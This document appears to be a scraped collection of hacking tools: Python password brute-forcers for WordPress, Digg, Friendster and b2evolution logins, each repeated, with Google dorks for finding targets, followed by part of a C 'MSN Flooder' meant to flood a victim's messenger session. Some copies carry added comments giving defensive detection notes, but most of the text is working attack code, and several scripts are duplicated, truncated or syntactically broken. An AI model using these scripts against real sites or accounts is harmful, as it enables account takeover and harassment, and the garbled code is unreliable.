print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
# One POST per entry; carriage returns and newlines are removed from the entry.
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('rememberme', 'forever'),
('wp-submit', 'Login >>'),
('redirect_to', 'wp-admin/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
# A request error is printed and the response body is treated as empty.
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("WordPress requires Cookies",site):
print "[-] Failed: WordPress has cookies enabled\n"
sys.exit(1)
# The outcome is decided by string matching on the response body only.
#Change this response if different. (language)
if re.search("ERROR",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
#WordPress Brute Force (wp-login.php)
#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)
#Dork: inurl:wp-login.php
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./wordpressbf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('rememberme', 'forever'),
('wp-submit', 'Login >>'),
('redirect_to', 'wp-admin/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("WordPress requires Cookies",site):
print "[-] Failed: WordPress has cookies enabled\n"
sys.exit(1)
#Change this response if different. (language)
if re.search("ERROR",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
Digg.com Login BruteForcer
#!/usr/bin/python
#Digg.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com diggBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./diggbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://digg.com/login"
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('username', sys.argv[1]),
('password', word),
('persistent', 'on'),
('submit', 'Login'),
('processlogin', '1'),
('returnpage', '/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(host, proxy_handler)
else:
opener = urllib2.build_opener(host)
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
#Digg.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com diggBF v1.0"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./diggbf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://digg.com/login"
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('username', sys.argv[1]),
('password', word),
('persistent', 'on'),
('submit', 'Login'),
('processlogin', '1'),
('returnpage', '/')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(host, proxy_handler)
else:
opener = urllib2.build_opener(host)
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
if re.search("
Whoops!
",site) == None:print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
Friendster.com Login BruteForcer
#!/usr/bin/python
#Friendster.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
# Flat script: parses the command line, optionally tests a proxy, then posts
# the login form to a fixed URL once per word-list entry, sequentially.
#
# Defender note: every request carries the same constant values - User-agent
# "Mozilla/5.0", tzoffset "240", and both btnLogIn and btnSignUp submitted
# together - while only the password field changes. That fixed combination is
# a usable signature for server-side detection, alongside per-account
# failed-login counting.
print "\n d3hydr8[at]gmail[dot]com friendsterBF v1.1"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./friendsterbf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
# Option scan: `proxy` and `verbose` are only bound when their flag is present.
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
# Proxy check: an unbound `proxy` raises NameError, which is how "not given"
# is detected; every failure path sets proxy to 0.
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
# Same NameError technique for the verbose flag.
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://www.friendster.com/login.php"
print "[+] BruteForcing:",host
print "[+] Email:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
# One POST per entry; carriage returns and newlines are removed from the entry.
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('_submitted', '1'),
('next', '/'),
('tzoffset', '240'),
('email', sys.argv[1]),
('password', word),
('remembermyemail', 'on'),
('btnLogIn', 'Log In'),
('btnSignUp','Sign Up')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
# A request error is printed and the response body is treated as empty.
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
# Defender note: the two checks below rely on the site returning different
# messages for an unknown address and for a wrong password. A single generic
# failure message removes that distinction.
if re.search("The email address you entered is not a valid Friendster login.",site):
print "\nThe email address you entered is not a valid Friendster login.\n"
sys.exit(1)
if re.search("The email address and password you entered did not match.",site) == None:
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
#Friendster.com Login BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com friendsterBF v1.1"
print "----------------------------------------------"
if len(sys.argv) not in [3,4,5,6]:
print "Usage: ./friendsterbf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
host = "http://www.friendster.com/login.php"
print "[+] BruteForcing:",host
print "[+] Email:",sys.argv[1]
try:
words = open(sys.argv[2], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
# Password-guessing loop: one HTTP POST to `host` (the login.php URL set above)
# per wordlist line, always for the single account named in sys.argv[1].
# Defender view: on the server this shows up as a run of login POSTs for one
# email address, each with a different password and a constant 'Mozilla/5.0'
# User-agent. Per-account attempt limits, lockout or step-up challenges, and a
# second factor are the controls that blunt this pattern.
for word in words:
# Drop the line ending left by readlines().
word = word.replace("\r","").replace("\n","")
# Form fields sent to the login page; only 'password' changes between attempts.
login_form_seq = [
('_submitted', '1'),
('next', '/'),
('tzoffset', '240'),
('email', sys.argv[1]),
('password', word),
('remembermyemail', 'on'),
('btnLogIn', 'Log In'),
('btnSignUp','Sign Up')]
login_form_data = urllib.urlencode(login_form_seq)
# proxy is 0 when none was given or the earlier connection test failed;
# otherwise every request is relayed through it.
# NOTE(defender): with a relay in the path the source address in the web log is
# the relay's, so limits keyed on the targeted account matter as well as
# limits keyed on the client address.
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
# A failed request is printed and then handled as an empty response body.
print msg
site = ""
pass
# The outcome is decided purely from two different error strings in the
# response body: one for an unknown email, one for a wrong password.
# Distinct messages like these tell any client whether an account exists;
# a single generic failure message removes that signal.
if re.search("The email address you entered is not a valid Friendster login.",site):
print "\nThe email address you entered is not a valid Friendster login.\n"
sys.exit(1)
# Absence of the "did not match" text is treated as a successful login.
if re.search("The email address and password you entered did not match.",site) == None:
print "\n\t[!] Login Successfull:",sys.argv[1],word,"\n"
sys.exit(1)
else:
if verbose == 1:
print "[-] Login Failed:",word
print "\n[-] Brute Complete\n"
Python Bruteforce
#!/usr/bin/python
#b2evolution Brute Force (login.php)
#Change response on line 90 if needed. (language)
#Dork: inurl:"/htsrv/login.php" intitle:b2evo
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com b2evoBF v1.0"
print "--------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./b2evobf.py \n"
print "\t -p/-proxy : Add proxy support"
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
# Password-guessing loop against a b2evolution login form: one POST to `host`
# per wordlist line, always for the user named in sys.argv[2].
# Defender view: the requests carry only the fields 'log', 'pwd' and 'submit',
# arrive back to back, and differ only in 'pwd'. No User-agent is set in this
# script, so the library default is sent (presumably the urllib2 one - confirm
# against the web log). Attempt limits per account and per source, lockout or
# a challenge after repeated failures, and a second factor are the mitigations.
for word in words:
# Drop the line ending left by readlines().
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('submit', 'Log in!')]
login_form_data = urllib.urlencode(login_form_seq)
# proxy is 0 when none was given or the earlier connection test failed;
# otherwise every request is relayed through it.
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
# A failed request is printed and then handled as an empty response body.
print msg
site = ""
pass
#Change this response if different. (language)
# The failure branch is taken only when the body contains "ERROR:" and verbose
# is 1; every other case falls through to the else branch and exits.
if re.search("ERROR:",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
#b2evolution Brute Force (login.php)
#Change response on line 90 if needed. (language)
#Dork: inurl:"/htsrv/login.php" intitle:b2evo
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import urllib2, sys, re, urllib, httplib, socket
print "\n d3hydr8[at]gmail[dot]com b2evoBF v1.0"
print "--------------------------------------------"
if len(sys.argv) not in [4,5,6,7]:
print "Usage: ./b2evobf.py
print "\t -p/-proxy
print "\t -v/-verbose : Verbose Mode\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-p" or arg.lower() == "-proxy":
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
try:
if proxy:
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
try:
if verbose == 1:
print "[+] Verbose Mode On\n"
except(NameError):
print "[-] Verbose Mode Off\n"
verbose = 0
pass
if sys.argv[1][:7] != "http://":
host = "http://"+sys.argv[1]
else:
host = sys.argv[1]
print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words),"\n"
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [
('log', sys.argv[2]),
('pwd', word),
('submit', 'Log in!')]
login_form_data = urllib.urlencode(login_form_seq)
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener(proxy_handler)
else:
opener = urllib2.build_opener()
try:
site = opener.open(host, login_form_data).read()
except(urllib2.URLError), msg:
print msg
site = ""
pass
#Change this response if different. (language)
if re.search("ERROR:",site) and verbose == 1:
print "[-] Login Failed:",word
else:
print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
sys.exit(1)
print "\n[-] Brute Complete\n"
MSN Flooder
#
/***************************************************************************
#
* Copyright (C) 2007 by Dani (Rebootz, Jeet99 ecc... :-P) *
#
* cradle.dani|at|gmail.com *
#
* *
#
* This program is free software; you can redistribute it and/or modify *
#
* it under the terms of the GNU General Public License as published by *
#
* the Free Software Foundation; either version 2 of the License, or *
#
* any later version. *
#
* *
#
* This program is distributed in the hope that it will be useful, *
#
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#
* GNU General Public License for more details. *
#
* *
#
* Compiling: $ gcc -Wall msnflooder.c -o msnflooder -lssl *
#
* Usage: $ ./msnflooder -f -a victim@hotmail.com -r nickname *
#
* *
#
* [Victim must be in your contact list AND connected !] *
#
* *
#
***************************************************************************/
#
#
#include
#
#include
#
#include
#
#include
#
#define SIGINT 2
#
#
int isalnum (int c);
#
int close(int fd);
#
void _exit(int status);
#
char *getpass (const char* prompt);
#
#
int kill(pid_t pid, int sig);
#
pid_t wait (int* status);
#
#
#
BIO *bio_err = 0;
#
#
/* usage */
#
#
void usage (char* prgname)
#
{
#
fprintf (stdout, "\n"
#
"Usage: %s -a\n\n"
#
"Victim must be in your contacts list and connected !\n\n"
#
"-a option set victim\n"
#
"-f option flood forever\n"
#
"-r option restore a nick name\n\n",
#
prgname);
#
_exit (2);
#
}
#
#
/* print an error to stderr and quit */
#
#
void _error (char* msg)
#
{
#
fprintf (stderr, "%s\n", msg);
#
_exit (-1);
#
}
#
#
/* receive other data */
#
#
void clean_sock (int sd)
#
{
#
char buff[1024];
#
int rval;
#
fd_set read_set;
#
struct timeval timeout;
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd+1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, sizeof buff - 1, 0);
#
}
#
return ;
#
}
#
#
/* verify a valid email address */
#
#
int verify_mail (char* account)
#
{
#
char* ptr;
#
unsigned short int l;
#
#
l = strlen (account);
#
#
if (l > 200)
#
_error ("WHAT ?!");
#
#
if ((ptr = strchr (account, '@')) == NULL || strchr (ptr, '.') == NULL)
#
return 1;
#
#
return 0;
#
}
#
#
/* read your account and password */
#
#
int get_data (char* account, char* pass, unsigned short size)
#
{
#
int set;
#
char* tmp;
#
#
fprintf (stdout, "Your account: ");
#
fflush (stdout);
#
fgets (account, size, stdin);
#
set = strlen (account) - 1;
#
* (account + set) = 0;
#
#
if (verify_mail (account))
#
{
#
fprintf (stderr, "\"%s\" isn't a valid email address.\n", account);
#
_exit (-1);
#
}
#
#
fprintf (stdout, "Your password: ");
#
fflush (stdout);
#
tmp = getpass ("");
#
if (strlen (tmp) > size - 1)
#
_error ("Password too long !?");
#
strcpy (pass, tmp);
#
#
return 0;
#
}
#
#
/* "encode" password; change only alphanumeric char in hex :D */
#
#
char* str_encode (char* str)
#
{
#
char* ret;
#
unsigned short len = strlen (str),
#
size = (len * 2 * sizeof (char)) + 1,
#
x, y;
#
#
if ((ret = (char*) malloc (size)) == NULL)
#
_error ("Cannot allocate memory.");
#
#
memset (ret, 0, size);
#
#
for (x=0, y=0; x #
if (!isalnum (str[x]))
#
{
#
sprintf(&ret[y], "%%%x", str[x]);
#
y += 2;
#
} else
#
ret[y] = str[x];
#
#
return ret;
#
}
#
#
/* resolve a hostname, save type and length of address in
#
* 'type' and 'length' and return ip */
#
#
char* resolve (int* type, int* length, char* host)
#
{
#
struct hostent* name;
#
char buffer[1024];
#
#
if ((name = gethostbyname (host)) == NULL)
#
{
#
snprintf (buffer, sizeof buffer -1, "Cannot resolve %s.", host);
#
_error (buffer);
#
}
#
#
*type = name->h_addrtype;
#
*length = name->h_length;
#
return (char*) *name->h_addr_list;
#
}
#
#
/*
 * Create the SSL_CTX used for the HTTPS requests in this file.
 *
 * On the first call (bio_err still 0) the OpenSSL library and its error
 * strings are initialised and bio_err is attached to stderr. Every call then
 * builds a fresh context from TLSv1_client_method(), so the client is pinned
 * to TLS 1.0.
 *
 * Returns the new context. The result of SSL_CTX_new() is not checked, so a
 * NULL context is handed straight back to the caller.
 *
 * NOTE(review): nothing here loads a trust store or calls
 * SSL_CTX_set_verify(), so as far as this block shows the server certificate
 * is never validated. main() sends the account name and password over
 * connections made with this context.
 */
#
#
SSL_CTX * initialize_ctx (void)
#
{
#
SSL_METHOD* method;
#
SSL_CTX* ctx;
#
#
/* one-time library initialisation, guarded by the global bio_err */
if (!bio_err)
#
{
#
SSL_library_init ();
#
SSL_load_error_strings ();
#
bio_err = BIO_new_fp (stderr, BIO_NOCLOSE);
#
}
#
method = TLSv1_client_method ();
#
ctx = SSL_CTX_new (method);
#
#
return ctx;
#
}
#
#
/*
 * Open a TCP connection to 'server', run a TLS handshake on it, send
 * 'request' and store the reply in 'buff'.
 *
 * request  text to send; it is first copied into 'buff'
 * type     address family written into sin_family
 * length   number of address bytes copied from 'server'
 * server   raw address bytes (as returned by resolve())
 * port     TCP port, host byte order
 * buff     caller's buffer, used for the outgoing copy and then the reply
 * size     capacity of 'buff'
 *
 * Returns 'buff'. Every failure path calls _error(), which exits the process.
 *
 * NOTE(review): no certificate or host name check is made between
 * SSL_connect() and SSL_write(), so the peer is not authenticated before the
 * request (which carries credentials when called from main()) is sent.
 */
#
#
char* _ssl_connect ( char *request, /* request page */
#
int type, /* type of address */
#
int length, /* server length */
#
char* server, /* IP server */
#
unsigned short port, /* port to connect */
#
char *buff, /* saved received data */
#
unsigned short size) /* max size received data */
#
{
#
SSL_CTX* ctx;
#
SSL* ssl;
#
BIO* sbio;
#
struct sockaddr_in server_in;
#
int sock;
#
#
ctx = initialize_ctx();
#
#
/* NOTE(review): sin_family comes from 'type' while the socket below is always
 * AF_INET, and 'length' bytes are copied into the 4-byte s_addr field; both
 * are only consistent when the resolver returned an IPv4 address. */
server_in.sin_family = type;
#
server_in.sin_port = htons (port);
#
memcpy ((char*) &server_in.sin_addr.s_addr, server, length);
#
#
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if ((connect (sock, (struct sockaddr*) &server_in, sizeof server_in)) < 0)
#
_error ("Cannot connect to host.");
#
#
ssl = SSL_new (ctx);
#
/* BIO_NOCLOSE: the socket stays open when the SSL object is freed; it is
 * closed explicitly at the end of the function. */
sbio = BIO_new_socket (sock, BIO_NOCLOSE);
#
SSL_set_bio (ssl, sbio, sbio);
#
/* NOTE(review): 'request' is passed as the format string itself, so any '%'
 * in it is read as a conversion specifier (CERT FIO30-C). The literal-format
 * form is snprintf (buff, size, "%s", request). */
snprintf (buff, size, request);
#
#
if (SSL_connect (ssl) <= 0)
#
_error ("Cannot connect to SSL server.");
#
if (SSL_write (ssl, buff, strlen(buff)) < 1)
#
_error ("Cannot send SSL data.");
#
/* The reply overwrites the request copy. A single SSL_read() of up to 'size'
 * bytes is made; if exactly 'size' bytes arrive, no terminating NUL is left
 * in 'buff' even though callers go on to treat it as a C string. */
memset (buff, 0, size);
#
if (SSL_read (ssl, buff, size) <= 0)
#
_error ("Cannot receive SSL data.");
#
if (SSL_shutdown (ssl) < 0)
#
_error ("Cannot shutdown SSL connection.");
#
#
SSL_free (ssl);
#
SSL_CTX_free (ctx);
#
close (sock);
#
#
return buff;
#
#
}
#
#
/* resolve a name and send ssl request to it. If received data NOT start with
#
'assertion', print error_message to stderr and quit ! */
#
#
int _ssl_request (int* type, int* length, char* host, int port, char* request, char* buff, unsigned short size,
#
char* assertion, char* error_message)
#
{
#
char* server;
#
char buffer[1024];
#
#
if ((inet_ntop (*type, host, buffer, sizeof buffer - 1)) != NULL)
#
{
#
fprintf (stdout, "Connecting to %s and send request...", buffer);
#
fflush (stdout);
#
}
#
#
#
server = resolve (type, length, host); /* type and length here will be modied */
#
_ssl_connect (request, *type, *length, server, port, buff, size);
#
#
if (assertion != (char*) NULL && strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error (error_message);
#
#
fprintf (stdout, "OK\n");
#
#
return 0;
#
}
#
#
/* connect to msn server and return a socket descriptor; socket NO close ;) */
#
#
int msn_connect (char* server, unsigned short port, int family, int length)
#
{
#
#
struct sockaddr_in sock;
#
int sd;
#
char buffer[2][1024];
#
#
if (inet_ntop (family, server, buffer[0], sizeof buffer[0] - 1) != NULL)
#
fprintf (stdout, "Connecting to %s at port %u...", buffer[0], port);
#
#
fflush (stdout);
#
#
sock.sin_family = family;
#
sock.sin_port = htons (port);
#
memcpy ((char*) &sock.sin_addr.s_addr, server, length);
#
#
if ((sd = socket (family, SOCK_STREAM, 0)) < 0)
#
_error ("Cannot create socket.");
#
#
if (connect (sd, (struct sockaddr*) &sock, sizeof sock) < 0)
#
{
#
if (*buffer == (char*) NULL)
#
_error ("Cannot connect to server.");
#
else
#
{
#
snprintf (buffer[1], sizeof buffer[1] - 1, "Cannot connect to %s.", buffer[0]);
#
_error (buffer[1]);
#
}
#
}
#
#
printf ("OK.\n");
#
return sd;
#
}
#
#
/* send dato to a server, save result on 'buff' without "\r\n"; socket (sd) is ALREADY connect
#
if request is null JUST receive data */
#
#
int msn_request (int sd, int family, char* server,
#
char* request, char* buff, unsigned short size)
#
{
#
char *set, buffer[2][512];
#
int read = 0;
#
#
memset (buff, 0, size);
#
#
if (request != (char*) NULL)
#
if ((send (sd, request, strlen (request), 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot send request to %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
if ((read = recv (sd, buff, size, 0)) < 0)
#
{
#
inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1);
#
snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot receive data from %s.", buffer[1]);
#
_error (buffer[0]);
#
}
#
#
buff[read] = 0;
#
if ((set = strrchr (buff, '\r')) != NULL)
#
*set = 0;
#
#
return 0;
#
}
#
#
/* call msn_request() and initialize login */
#
#
int msn_start (int sd, int type, char* server, char* account, char* buff, unsigned short buff_size)
#
{
#
#
char request[buff_size];
#
#
snprintf (request, buff_size, "VER 1 MSNP11 CVR0\r\n");
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "CVR 2 0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
snprintf (request, buff_size, "USR 3 TWN I %s\r\n", account);
#
msn_request (sd, type, server, request, buff, buff_size);
#
#
return 0;
#
}
#
#
/* get from received data (data) new server ip end port. Save it in 'redirect' and 'port' */
#
#
int xfr_redirect (char* data, char* redirect, unsigned short size, unsigned short* port)
#
{
#
char *set, *cut;
#
#
if (strncmp (data, "XFR", 3) != 0 || (set = strstr (data, "NS ")) == NULL)
#
_error ("Cannot get server to redirect.");
#
set += 3; /* delete 'NS ' */
